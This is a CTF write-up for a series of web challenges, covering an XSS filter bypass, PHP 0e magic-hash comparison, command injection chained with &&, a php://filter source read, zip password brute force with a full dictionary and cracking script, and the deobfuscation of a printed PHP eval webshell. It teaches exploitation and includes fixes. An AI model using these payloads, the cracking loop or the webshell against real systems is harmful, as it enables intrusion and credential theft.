来个弹窗 (pop an alert)
Start with the most basic XSS alert payload:
<script>alert("xss")</script>
Nothing renders, so guess that the word script is being stripped. The strip is a single pass, so the double-write trick gets past it: removing one "script" from each tag leaves a well-formed script tag behind.
<scrscriptipt>alert("xss")</scscriptript>
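To see why the double-write works, here is an added Python model (not the challenge's code, and the filter body is an assumption about what the server does) of a one-pass keyword filter next to a fixed-point strip and proper output encoding. The two payloads are the ones used above.

```python
import html

# Constructed inputs: the two payloads used above.
BASIC = '<script>alert("xss")</script>'
DOUBLE_WRITE = '<scrscriptipt>alert("xss")</scscriptript>'


def naive_filter(value: str) -> str:
    """Assumed server-side filter: delete the keyword once.

    One pass over the input means a keyword that only appears after the
    deletion is never seen, which is exactly what the double-write relies on.
    """
    return value.replace("script", "")


def fixed_point_strip(value: str, keyword: str = "script") -> str:
    """Strip until nothing changes. Closes the double-write hole but is still a
    blocklist: case changes ("ScRiPt") and other vectors (<img onerror=...>) pass."""
    while keyword in value:
        value = value.replace(keyword, "")
    return value


def encode_for_html(value: str) -> str:
    """The real fix for reflected input: contextual output encoding. The browser
    receives &lt;script&gt;, which renders as text and never becomes an element."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for label, payload in (("basic", BASIC), ("double-write", DOUBLE_WRITE)):
        print(f"{label:12} naive -> {naive_filter(payload)}")
        print(f"{label:12} fixed -> {fixed_point_strip(payload)}")
        print(f"{label:12} enc   -> {encode_for_html(payload)}")
```

The naive filter is also case-sensitive, so `<ScRiPt>` passes untouched; that is the usual second bypass to try when double-writing fails.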
background
View the page source.
Look at the JS file.
It behaves like a command executor: d is the output and p is the action.
0e事件 (the 0e trick)
This tests "MD5 collisions" of the 0e kind, which is not a real collision but PHP type juggling: when both operands of == are numeric strings they are compared as numbers, and an MD5 hex digest of the form 0e followed only by digits is a numeric string equal to 0. Two different inputs whose digests both look like that compare equal under ==; === (or hash_equals) is not fooled.
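An added Python model of the comparison (not from the page) with two well-known magic inputs from public CTF lore, plus the shape of the search that produces such inputs. php_loose_eq is an approximation of PHP's == restricted to two strings.

```python
import hashlib
import re

# Subset of PHP's numeric-string grammar that matters here: optional sign, digits,
# optional fraction, optional exponent. "0e830400..." matches and is the number 0.
NUMERIC_STRING = re.compile(r"^[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP's `==` on two strings: if both are numeric strings they are
    compared as numbers (PHP 5, 7 and 8 agree on this case), else byte for byte."""
    if NUMERIC_STRING.match(a) and NUMERIC_STRING.match(b):
        return float(a) == float(b)
    return a == b


def php_strict_eq(a: str, b: str) -> bool:
    """`===`: same type and same bytes. This is what a login check should use."""
    return a == b


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def is_magic(hexdigest: str) -> bool:
    """A 'magic' hash: 0e followed by digits only, so it parses as 0e<int>, i.e. 0."""
    return hexdigest.startswith("0e") and hexdigest[2:].isdigit()


def find_magic_decimal(start: int, stop: int):
    """Scan decimal strings for a magic MD5. The chance per candidate is about
    (1/256) * (10/16)**30, roughly 3e-9, so real searches cover ~1e9 inputs;
    this loop is the shape of that search, not a fast way to run it."""
    for n in range(start, stop):
        s = str(n)
        if is_magic(md5_hex(s)):
            return s
    return None


# Two well-known magic inputs (public CTF lore, not from this page).
KNOWN = ("QNKCDZO", "240610708")

if __name__ == "__main__":
    a, b = (md5_hex(k) for k in KNOWN)
    print(a, b)
    print("==  :", php_loose_eq(a, b))   # both are 0e<digits>, so 0.0 == 0.0
    print("=== :", php_strict_eq(a, b))  # different strings
```

When the challenge hashes your input and compares with ==, any one of the known magic inputs works; when it compares two of your inputs, send two different ones.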
复读机RCE (repeater RCE)
The hint says something "cannot be said"; try echo.
Command execution works.
xCsMsD
Register any account and log in.
Commands can be run from the cmd box, but there is a filter.
Look at the cookies and decode them.
There is a substitution: spaces are replaced with - and \ with /.
So to read a file the command is written as
cat-<file>
and tac can be used here to bypass the filter (same content, lines in reverse order).
coke的登陆 (coke's login)
Check the hint.
Guess it is the password.
Login succeeds; the flag is in the page source.
bllbl_rce
Directory scan finds /admin/admin.php.
Download the source:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Command Query Tool</title>
</head>
<body>
    <h1>Command Query Tool</h1>
    <form action="index.php" method="post">
        <label for="command">Enter your command</label>
        <input type="text" id="command" name="command" required>
        <button type="submit">Run</button>
    </form>
    <?php
    if (isset($_POST['command'])) {
        $command = $_POST['command'];
        // the only check: the string must contain "bllbl" somewhere
        if (strpos($command, 'bllbl') === false) {
            die("no");
        }
        echo "<pre>";
        system($command);   // the whole string goes to the shell
        echo "</pre>";
    }
    ?>
</body>
</html>
The command we send must contain the characters bllbl; the check is a plain substring test, so chain the real command on with &&. Order matters: bllbl is not a program, so `bllbl && ls` stops after the failed first command, while `echo bllbl && ls` (or `ls;bllbl`, or `ls #bllbl`) runs what we want.
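An added Python emulation (not the challenge's code) of the gate and the system() call, to show which orderings of the token actually run a command, alongside the shape of a hardened version. It starts a real /bin/sh, so run it on a Linux box.

```python
import shlex
import subprocess

TOKEN = "bllbl"


def passes_gate(command: str) -> bool:
    """The page's check, literally: strpos($command, 'bllbl') === false -> die('no')."""
    return TOKEN in command


def run_like_admin_php(command: str):
    """Emulate system($command): the gate, then the whole string handed to sh -c.
    Returns (accepted, stdout, exit_code)."""
    if not passes_gate(command):
        return False, "", None
    proc = subprocess.run(["sh", "-c", command], capture_output=True, text=True)
    return True, proc.stdout, proc.returncode


def payload(cmd: str) -> str:
    """Satisfy the substring check with a command that succeeds, then chain ours.
    'bllbl && cmd' does NOT work: sh cannot find 'bllbl' and && short-circuits."""
    return f"echo {TOKEN} && {cmd}"


# Assumed allowlist for the hardened variant; the page's tool has none.
ALLOWED = {"echo", "date", "uptime"}


def hardened_run(command: str):
    """What such a tool should do if it must run commands at all: tokenize,
    allowlist argv[0], and never start a shell, so &&, ; and | are plain arguments."""
    argv = shlex.split(command)
    if not argv or argv[0] not in ALLOWED:
        return False, "", None
    proc = subprocess.run(argv, capture_output=True, text=True)
    return True, proc.stdout, proc.returncode


if __name__ == "__main__":
    for c in ("id", "bllbl && id", payload("id"), "id;bllbl"):
        print(repr(c), "->", run_like_admin_php(c))
    print(repr("echo bllbl && id"), "->", hardened_run("echo bllbl && id"))
```

In the hardened variant the token-laden string is passed to echo as three literal arguments, which is the point: without a shell between the request and the binary there is nothing for && to mean.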
椰子树晕淡水鱼
Guess a file inclusion vulnerability; a directory scan finds /password and /admin.php.
A zip file is downloaded from there.
Brute-force the zip password.
Password dictionary:
zhsh
2004
yzhsh
y2004
y183
zhshy
zhshzhsh
zhshzs
zhsh2004
zhsh183
zszhsh
zszs
zs2004
zs183
2004y
2004zhsh
2004zs
20042004
2004183
183y
183zhsh
183zs
1832004
183183
yyzhsh
yyzs
yy2004
yy183
yzhshy
yzhshzhsh
yzhshzs
yzhsh2004
yzhsh183
yzsy
yzszhsh
yzszs
yzs2004
yzs183
y2004y
y2004zhsh
y2004zs
y20042004
y2004183
y183y
y183zhsh
y183zs
y1832004
y183183
zhshyy
zhshyzhsh
zhshyzs
zhshy2004
zhshy183
zhshzhshy
zhshzhshzhsh
zhshzhshzs
zhshzhsh2004
zhshzhsh183
zhshzsy
zhshzszhsh
zhshzszs
zhshzs2004
zhshzs183
zhsh2004y
zhsh2004zhsh
zhsh2004zs
zhsh20042004
zhsh2004183
zhsh183y
zhsh183zhsh
zhsh183zs
zhsh1832004
zhsh183183
zsyy
zsyzhsh
zsyzs
zsy2004
zsy183
zszhshy
zszhshzhsh
zszhshzs
zszhsh2004
zszhsh183
zszsy
zszszhsh
zszszs
zszs2004
zszs183
zs2004y
zs2004zhsh
zs2004zs
zs20042004
zs2004183
zs183y
zs183zhsh
zs183zs
zs1832004
zs183183
2004yy
2004yzhsh
2004yzs
2004y2004
2004y183
2004zhshy
2004zhshzhsh
2004zhshzs
2004zhsh2004
2004zhsh183
2004zsy
2004zszhsh
2004zszs
2004zs2004
2004zs183
20042004y
20042004zhsh
20042004zs
200420042004
20042004183
2004183y
2004183zhsh
2004183zs
20041832004
2004183183
183yy
183yzhsh
183yzs
183y2004
183y183
183zhshy
183zhshzhsh
183zhshzs
183zhsh2004
183zhsh183
183zsy
183zszhsh
183zszs
183zs2004
183zs183
1832004y
1832004zhsh
1832004zs
18320042004
1832004183
183183y
183183zhsh
183183zs
1831832004
183183183
zhsh920
zhsh/zhsh920
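The dictionary above is every concatenation of one to three of the tokens y, zhsh, zs, 2004 and 183 (initials and numbers picked up during recon, which is an assumption on my part), with the one entry that is not a product of them, zhsh920, added by hand. Here is an added Python generator for such a list and a loop that tries it against a ZipCrypto archive; this is my code, not the writeup's, and the zip path is supplied on the command line.

```python
import itertools
import sys
import zipfile
import zlib

# The building blocks the page's dictionary is made of (assumed: recon material).
TOKENS = ["y", "zhsh", "zs", "2004", "183"]


def generate(tokens=TOKENS, min_parts=1, max_parts=3):
    """Every concatenation of min_parts..max_parts tokens, duplicates removed, order kept."""
    seen, words = set(), []
    for n in range(min_parts, max_parts + 1):
        for combo in itertools.product(tokens, repeat=n):
            word = "".join(combo)
            if word not in seen:
                seen.add(word)
                words.append(word)
    return words


def crack_zip(path, words):
    """Try each candidate against the first entry. zipfile only speaks the legacy
    ZipCrypto scheme (AES entries raise NotImplementedError); a wrong password
    normally raises RuntimeError, and about 1 in 256 wrong passwords slips past
    the one-byte header check and fails later inside zlib instead."""
    with zipfile.ZipFile(path) as zf:
        name = zf.namelist()[0]
        for word in words:
            try:
                zf.read(name, pwd=word.encode())
                return word
            except (RuntimeError, zipfile.BadZipFile, zlib.error):
                continue
    return None


if __name__ == "__main__":
    # Recon candidates the product cannot produce go first; they are the likeliest.
    candidates = ["zhsh920"] + generate()
    if len(sys.argv) > 1:
        print(crack_zip(sys.argv[1], candidates))
    else:
        print(len(candidates), "candidates, first five:", candidates[:5])
```

Note that zhsh920 is not in the generated set at all, so a product of tokens alone would have missed it; for anything beyond a few hundred candidates use zip2john with john or hashcat rather than this loop.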
Then a file upload.
再给我30元 (give me another 30 yuan)
View the page source.
The hint says the parameter is id.
Use sqlmap on it.
狗黑子CTF变强之路
Directory scan: /admin.php
There is probably a file inclusion vulnerability here.
Use the php://filter wrapper to read admin.php; base64-encoding the stream makes the include return the PHP source as text instead of executing it:
?page=php://filter/convert.base64-encode/resource=admin.php
Decode it:
<?php
if ($_SERVER["REQUEST_METHOD"] == "POST") {
    // hard-coded username and password
    $correctUsername = "ggouheizi";
    $correctPassword = "zigouhei";
    $username = $_POST['username'];
    $password = $_POST['password'];
    if ($username == $correctUsername && $password == $correctPassword) {
        // login succeeded: redirect straight to gougougou.php
        header("Location: gougougou.php");
        exit;
    } else {
        $errorMessage = "Wrong username or password, please try again.";
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Secret Ruins</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
        }
        form {
            background-color: white;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
            width: 300px;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
        }
        label {
            display: block;
            margin-bottom: 5px;
            font-weight: bold;
        }
        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 10px;
            margin-bottom: 15px;
            border: 1px solid #ccc;
            border-radius: 5px;
            box-sizing: border-box;
            transition: border-color 0.3s ease;
        }
        input[type="text"]:focus,
        input[type="password"]:focus {
            border-color: #4CAF50;
        }
        input[type="submit"] {
            padding: 10px 20px;
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        input[type="submit"]:hover {
            background-color: #45a049;
        }
    </style>
</head>
<body>
    <form method="post">
        <label for="username">Username:</label><br>
        <input type="text" name="username"><br>
        <label for="password">Password:</label><br>
        <input type="password" name="password"><br><br>
        <input type="submit" value="Log in">
        <?php if(isset($errorMessage)) { echo $errorMessage; }?>
    </form>
</body>
</html>
Then read gougougou.php the same way:
<?php
$gou1="8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar";
$gou2="bgW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09";
$gou3="tVXTklXR1prWVhWcCmNVZG5kMDV3ZEVsQ1MybEVjM2hOUlhweFFscHJUM1YzVldGVVMwWllVbVpNWjIxMlkyaGlhWEJaWkU1NVFVZHpTVmRXUlZGdWVHcEVVRzlJVTNSRFRVcHlaV3h0VFRscVYwRm1lSEZ1VkRKVldXcE1TMms1Y1hjeFJFWlpUa2xvWjFsU2MwUm9WVlpDZDBWWVIzWkZOMGhOT0N0UGVEMDk=";
$gou4=$gou1{20}.$gou1{41}.$gou1{13}.$gou1{38}.$gou1{6}.$gou1{9}.$gou1{1}.$gou1{25}.$gou1{2};
$gou5=$gou2{30}.$gou2{27}.$gou2{51}.$gou2{0}.$gou2{44}.$gou2{1}.$gou2{28}.$gou2{30}.$gou2{79}.$gou2{87}.$gou2{61}.$gou2{61}.$gou2{79};
$gou6=$gou1{34}.$gou3{36}.$gou1{39}.$gou3{41}.$gou1{47}.$gou3{0}.$gou3{20}.$gou3{16}.$gou3{62}.$gou3{62}.$gou3{159}.$gou3{3}.$gou1{37}.$gou3{231};
#$gou7=Z291MnsxN30uZ291MXs4fS5nb3U0ezR9LmdvdTV7MTJ9KCRnb3U0LiRnb3U1LiRnb3U2KQ==;
?>
After deobfuscation this is a one-line webshell with password cmd. The `$str{n}` syntax is the PHP 5/7 string offset (same as `$str[n]`, removed in PHP 8): $gou4, $gou5 and $gou6 each pick single characters out of the long strings by index, the three pieces concatenate into one base64 string, and the commented $gou7 line is itself base64 of a final expression that assembles the function name the same way and calls it on that string.
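An added Python re-implementation of the decode (not the challenge's or the writeup's code) so the result can be checked without an old PHP interpreter. The strings and offset expressions are copied from the listing above; the one assumption is that `\v` in $gou1 counts as two characters (see the comment). Run as printed, the three stages base64-decode to `<?php eval($_PSOT['cmd']);`, and the $gou7 comment decodes to `gou2{17}.gou1{8}.gou4{4}.gou5{12}($gou4.$gou5.$gou6)`, whose name part assembles to `eva1`: a swapped letter pair in the superglobal and a 1 where an l belongs, so `$gou2{61}.$gou2{61}` and `$gou5{12}` are where the printed copy drifts from the `$_POST`/`eval` the page reports. That is the reason to script it rather than decode by hand: the tool shows exactly where the listing and the conclusion disagree.

```python
import base64
import re

# Carrier strings as printed on this page. gou1 is a raw string so that "\v" stays two
# characters, which is how the page's offsets line up (assumption: the original file
# stores it single-quoted or with the backslash escaped; in a double-quoted PHP string
# "\v" is one vertical-tab byte and every offset after position 7 shifts by one).
GOU = {
    "gou1": r"8AZ1mha\vHTnv9k4yAcyPZj98gG47*yESyR3xswJcDD4J2DNar",
    "gou2": "bgW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09",
    "gou3": "tVXTklXR1prWVhWcCmNVZG5kMDV3ZEVsQ1MybEVjM2hOUlhweFFscHJUM1YzVldGVVMwWllVbVpNWjIxMlkyaGlhWEJaWkU1NVFVZHpTVmRXUlZGdWVHcEVVRzlJVTNSRFRVcHlaV3h0VFRscVYwRm1lSEZ1VkRKVldXcE1TMms1Y1hjeFJFWlpUa2xvWjFsU2MwUm9WVlpDZDBWWVIzWkZOMGhOT0N0UGVEMDk=",
}

# The offset expressions, verbatim from the page. `$s{n}` is the PHP 5/7 string
# offset (identical to `$s[n]`, gone in PHP 8), so re-implementing it here avoids
# needing an old interpreter.
EXPRS = [
    ("gou4", "$gou1{20}.$gou1{41}.$gou1{13}.$gou1{38}.$gou1{6}.$gou1{9}.$gou1{1}.$gou1{25}.$gou1{2}"),
    ("gou5", "$gou2{30}.$gou2{27}.$gou2{51}.$gou2{0}.$gou2{44}.$gou2{1}.$gou2{28}.$gou2{30}.$gou2{79}.$gou2{87}.$gou2{61}.$gou2{61}.$gou2{79}"),
    ("gou6", "$gou1{34}.$gou3{36}.$gou1{39}.$gou3{41}.$gou1{47}.$gou3{0}.$gou3{20}.$gou3{16}.$gou3{62}.$gou3{62}.$gou3{159}.$gou3{3}.$gou1{37}.$gou3{231}"),
]

# The commented-out $gou7 line.
GOU7_B64 = "Z291MnsxN30uZ291MXs4fS5nb3U0ezR9LmdvdTV7MTJ9KCRnb3U0LiRnb3U1LiRnb3U2KQ=="

OFFSET = re.compile(r"\$?(\w+)\{(\d+)\}")


def assemble(expr, table):
    """Evaluate a '$a{i}.$b{j}...' concatenation against the string table."""
    out = []
    for name, idx in OFFSET.findall(expr):
        s, i = table[name], int(idx)
        if i >= len(s):
            raise IndexError(f"{name}{{{i}}}: string has only {len(s)} chars")
        out.append(s[i])
    return "".join(out)


def deobfuscate(strings=GOU, exprs=EXPRS):
    """Run the stages in order (later stages may index earlier results) and
    base64-decode the concatenation. Returns (table, decoded_source)."""
    table = dict(strings)
    for name, expr in exprs:
        table[name] = assemble(expr, table)
    blob = table["gou4"] + table["gou5"] + table["gou6"]
    return table, base64.b64decode(blob).decode()


def final_call(table, gou7_b64=GOU7_B64):
    """Decode the $gou7 comment: one more offset expression, this time building
    the name of the function that is called on the assembled string."""
    expr = base64.b64decode(gou7_b64).decode()
    func_expr = expr.split("(", 1)[0]
    return expr, assemble(func_expr, table)


if __name__ == "__main__":
    table, source = deobfuscate()
    for k in ("gou4", "gou5", "gou6"):
        print(k, "=", table[k])
    print("decoded:", source)
    expr, func = final_call(table)
    print("gou7 =", expr, "-> calls", repr(func))
```

Swap the raw string for a normal one (so `\v` becomes a vertical tab) and $gou4 no longer starts with PD9waHAg, the base64 of `<?php `; that single check tells you which quoting the original file used.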
小白说收集很重要 (Xiaobai says recon matters)
The title says it all: directory scan.
admin/admin123456
Generate the password the way the challenge describes.
sysadmin/xiaobai